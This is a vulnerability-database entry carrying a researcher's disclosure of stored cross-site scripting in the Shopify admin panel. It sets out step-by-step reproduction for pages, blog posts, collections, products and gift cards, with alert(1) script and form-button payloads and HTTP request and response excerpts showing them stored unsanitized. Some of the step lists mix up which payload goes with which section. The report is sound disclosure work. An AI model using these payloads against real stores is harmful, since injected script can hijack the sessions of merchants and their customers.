Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Shopify Cross Site Scripting Vulnerability

🗓️ 13 Mar 2023 00:00:00Reported by Andrey StoykovType 
zdt
 zdt🔗 0day.today👁 600 Views

Shopify website vulnerabilities found in Online Store, Blog Posts, and Collections with XSS payload

Code
Correspondence from Shopify declined to comment regarding new discovered
vulnerabilities within their website.

Although 'frontend' vulnerabilities are considered out of scope,
person/tester foundhimself a beefy bugbounty from the same page that has
been listed below, including similar functionality that has not been tested
yet.

Two emails and several  reports, the 'hacker-1' staff reject the bid for
findings.


Online Store -> Pages -> Add Page -> Title -> Title_Name -> Content ->
Paste Payload -> <script src=1 href=1
onerror="javascript:alert(1)"></script>-> Show HTML -> Fix HTML encoding of
tags from

<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>


1. Browse to Online Store
2. Select Pages ->  Add Page
3. Set Title -> Title_Name
4. Set Content -> Paste Payload -> <script src=1 href=1
onerror="javascript:alert(1)"></script>
5. Select Show HTML
6. Fix HTML encoding of tags

<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/online-store/admin/api/unversioned/graphql?operation=PageUpdate
HTTP/2
Host: test-img-src-x-onerror-alert1-test.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)
Gecko/20100101 Firefox/108.0
[...]

[...]
"page":{"bodyHtml":"<script src=1 href=1
onerror=\"javascript:alert(1)\"></script>"
[...]


// HTTP response

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
[...]

[...]
page":{"id":"gid://shopify/OnlineStorePage/...","body":"<script src=\"1\"
href=\"1\"
onerror=\"javascript:alert(1)\"></script>\n\ntest","title":"Title_Name"
[...]


Online Store -> Blog Posts -> Add Blog Post -> Title -> Blog_Title ->
Content -> Paste Payload -> <form><button
formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML
-> Fix HTML encoding of tags from
<p><form><button
formaction="javascript:javascript:alert(1)">X</button></form></p>
to <p><form><button formaction="javascript:javascript:alert(1)">X<br
/></button></form></p>

1. Browse to Online Store
2. Select Blog Posts -> Add Blog Post
3. Set Title -> Blog_Title
4. Set Content -> Paste Payload -> <script src=1 href=1
onerror="javascript:alert(1)"></script>
5. Select Show HTML
6. Fix HTML encoding of tags

<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST
/admin/online-store/admin/api/unversioned/graphql?operation=ArticleUpdate
HTTP/2
Host: test-img-src-x-onerror-alert1-test.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)
Gecko/20100101 Firefox/108.0
[...]

[...]
"article":{"blogId":"gid://shopify/OnlineStoreBlog/...","body":"<script
src=1 href=1 onerror=\"javascript:alert(1)\"></script>"
[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
[...]

[...]
"article":{"id":"gid://shopify/OnlineStoreArticle/...","title":"Blog_Title","body":"<script
src=\"1\" href=\"1\"
onerror=\"javascript:alert(1)\"></script>\n","handle":"blog_title-2"
[...]


Products -> Collections -> Create Collection -> Title -> Product_Title ->
Description -> Paste Payload -> <form><button
formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML
-> Fix HTML encoding of tags from
<p><form><button
formaction="javascript:javascript:alert(1)">X</button></form></p>
to <p><form><button formaction="javascript:javascript:alert(1)">X<br
/></button></form></p>

1. Browse to Products
2. Select Collections -> Create Collection
3. Set Title -> Collection_Title
4. Set Content -> Paste Payload -> <script src=1 href=1
onerror="javascript:alert(1)"></script>
5. Select Show HTML
6. Fix HTML encoding of tags

<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST
/admin/internal/web/graphql/core?operation=CreateCollection&type=mutation
HTTP/2
Host: test-img-src-x-onerror-alert1-test.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)
Gecko/20100101 Firefox/108.0
[...]

[...]
"collection":{"title":"Collection_Title","descriptionHtml":"<script src=1
href=1 onerror=\"javascript:alert(1)\"></script>"
[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
[...]

[...]
"collection":{"id":"gid://shopify/Collection/...","title":"Collection_Title","descriptionHtml":"<script
src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>"
[...]


Products -> Inventory -> View Products -> Double Click on Product -> Title
-> Inventory_Title -> Description -> Paste Payload -> <form><button
formaction="javascript:javascript:alert(1)">X </button></form> -> Show HTML
-> Fix HTML encoding of tags from
<p><form><button
formaction="javascript:javascript:alert(1)">X</button></form></p>
to <p><form><button formaction="javascript:javascript:alert(1)">X<br
/></button></form></p>

1. Browse to Products
2. Select Inventory-> View Products
3. Select Product -> Title -> Product_Title
4. Set Description  -> Paste Payload -> <script src=1 href=1
onerror="javascript:alert(1)"></script>
5. Select Show HTML
6. Fix HTML encoding of tags

<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation
HTTP/2
Host: test-img-src-x-onerror-alert1-test.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)
Gecko/20100101 Firefox/108.0
[...]

[...]
"product":{"descriptionHtml":"<script onerror=\"javascript:alert(1)\"
href=\"1\" src=\"1\"></script>","workflow":"product-details-update"
[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
[...]

[...]
"product":{"id":"gid://shopify/Product/...","title":"Product_Title","handle":"product_title","descriptionHtml":"<script
onerror=\"javascript:alert(1)\" href=\"1\" src=\"1\"></script>"
[...]




Products -> Add Product -> Title -> Product_Title -> Description -> Paste
Payload -> <form><button formaction="javascript:javascript:alert(1)">X
</button></form> -> Show HTML -> Fix HTML encoding of tags from
<p><form><button
formaction="javascript:javascript:alert(1)">X</button></form></p>
to <p><form><button formaction="javascript:javascript:alert(1)">X<br
/></button></form></p>

1. Browse to Products
2. Add Product -> Title -> Product_Title
3. Set Description -> Paste Payload -> <script src=1 href=1
onerror="javascript:alert(1)"></script>
4. Select Show HTML
5. Fix HTML encoding of tags


<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=UpdateProduct&type=mutation
HTTP/2
Host: test-img-src-x-onerror-alert1-test.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)
Gecko/20100101 Firefox/108.0
[...]

[...]
"product":{"descriptionHtml":"<p>&nbps;</p>...\"><script src=1 href=1
onerror=\"javascript:alert(1)\"></script>\n</code></pre>"
[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
[...]

[...]
"title":"Gift_Title","><script src=\"1\" href=\"1\"
onerror=\"javascript:alert(1)\"></script>\n</code></pre>",
[...]



Products -> Gift Cards -> Add Gift Card Products -> Gift_Title -> Paste
Payload -> <form><button formaction="javascript:javascript:alert(1)">X
</button></form> -> Show HTML -> Fix HTML encoding of tags from
<p><form><button
formaction="javascript:javascript:alert(1)">X</button></form></p>
to <p><form><button formaction="javascript:javascript:alert(1)">X<br
/></button></form></p>

1. Browse to Products
2. Select Gift Cards
3. Add Gift Card Products -> Gift_Title
4. Set Description -> Paste Payload -> <script src=1 href=1
onerror="javascript:alert(1)"></script>
5. Select Show HTML
6. Fix HTML encoding of tags


<script src=1 href=1 onerror="javascript:alert(1)"></script>

<script src=1 href=1 onerror="javascript:alert(1)"></script>


// HTTP POST request showing XSS payload

POST /admin/internal/web/graphql/core?operation=CreateProduct&type=mutation
HTTP/2
Host: test-img-src-x-onerror-alert1-test.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0)
Gecko/20100101 Firefox/108.0
[...]

[...]
"product":{"title":"Gift_Title","descriptionHtml":"<script src=1 href=1
onerror=\"javascript:alert(1)\"></script>"
[...]


// HTTP response showing unsanitized payload

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
[...]

[...]
"title":"Gift_Title","handle":"gift_title-1","descriptionHtml":"<script
src=\"1\" href=\"1\" onerror=\"javascript:alert(1)\"></script>"
[...]



1. Browse to /admin/pages
2. Template -> Add Section -> Contact Form -> Heading -> XSS Payload
3. Online Store -> Pages -> Add Page ->

<form><button formaction="javascript:javascript:alert(1)">X</button></form>

https://test-img-src-x-onerror-alert1-test.myshopify.com/admin/settings/notifications

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Mar 2023 00:00Current
7.1High risk
Vulners AI Score7.1
shopifyvulnerabilitiesonline storeblog postscollectionsxsspayloadsbug bountyhttp requesthttp responsesecurity document
600